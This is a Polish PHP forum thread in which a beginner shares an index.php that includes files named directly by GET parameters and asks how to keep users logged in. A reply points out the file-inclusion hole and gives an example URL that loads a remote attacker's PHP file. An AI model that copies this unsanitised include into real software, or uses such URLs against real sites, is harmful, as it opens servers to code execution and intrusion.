Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: panel z logowaniem
Forum PHP.pl > Forum > PHP
arcktick
13.01.2007, 19:42:27
pisze forum oparte na php i mysql i chcialbym zrobic na nim cos w rodzaju panelu logowania tak jak to na przyklad jest na tym forum zrobione. W tej chwili konstrukcja mojego pliku index.php wygląda nastepujaco:
[PHP] pobierz, plaintext 
  1. <HTML>
  2. <HEAD>
  3. <TITLE>WSPANIALE FORUM</TITLE>
  4. <link rel="Stylesheet" type="text/css" href="style.css" />
  5. </HEAD>
  6. <BODY bgcolor="white">
  7. <TABLE align="center"><TR><TD><IMG SRC="top.jpg"></TD></TR></TABLE><br>
  8. <-----------LOGOWANIE----------------------------------------->
  9. <?php
  10. if(!isset($_GET['Nazwa2']))
  11. {
  12. 	$parowka2="login.php";
  13. 	include($parowka2);
  14. }
  15. if(isset($_GET['Nazwa2']))
  16. {
  17. 	$parowka2=$_GET['Nazwa2'];
  18. 	require_once($parowka2);
  19. }
  20. ?>
  21. <BR><BR>
  22. <a href="index.php?Name=main.php">Wyswietl grupy tematyczne</a>
  23. <!---------------------------srodkowy pas ------------------------------->
  24. <?php 
  25. if(!isset($_GET['Name']))$parowka="main.php";
  26. if(isset($_GET['Name']))$parowka=$_GET['Name'];
  27. include($parowka);
  28.  
  29.  
  30. ?>
  31.  
  32. </BODY>
  33.  
  34.  
  35.  
  36. </HTML>
[PHP] pobierz, plaintext


I spoko moge sie zalogowac.Tylko ze jakakolwiek akcja uruchamiajaca index.php wylogowuje mnie co zreszta jest do przewidzenia bo skrypt wykonuje sie od poczatku. Moje pytanie dotyczy tego czy da sie to jakos rozwiazac przy takim ukladzie index.php ktory zawiera dwa niezalezne includy i czy wogole da sie tak zrobic zeby odczytane przeze mnie przywileje uzytkownika byly globalnie widoczne ( na czas sesji uzytkownika- jest mi to potrzebne przy okreslaniu akcji jakie uzytkownik moze podejmowac).
Chodzi mi o dokladnie taki sam panel logowania jak jest na tym forum.
pozdrawiam i z gory dzieki za kazda sugestie
Kamil J.
13.01.2007, 19:48:41
Sugestia: twój kod to deser dla potencjalnego haxora.

w GET'cie trzymasz całą nazwę includowanego pliku? tzn index.php?nazwa2=page.php

potencjalny haxor wpisze:
index.php?nazwa2=http://serwerhaxora.pl/plik_pozwalajacy_mu_sie_wlamac.php

i co wtedy snitch.gif

zobacz to: Temat: Bezpieczenstwo skryptow php

Co do logowania to najpierw popraw ten kod ^^
arcktick
14.01.2007, 10:52:25
tak wiem bezpieczenstwo jest bardzo wazne ale to blad jest do wyeliminowania. moim bole jest w tej chwili to jak zrobic dwa niezalezne includy tak zeby wywolanie jednego nie wywolywalo drugiego

luz poradzilem sobie dzieki zastosowaniu sesji uzytkownika :-)
Kamil J.
14.01.2007, 10:52:46
Wytłumacz to jakoś dokładniej, bo w tym pierwszym poście to nic nie rozumiem.

Mówisz o jakiś przywilejach/logowaniach, a pokazujesz kod który jest odpowiedzialny na wyświetlenie danej treści. ocb?

Pozdrawiam Kamil
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.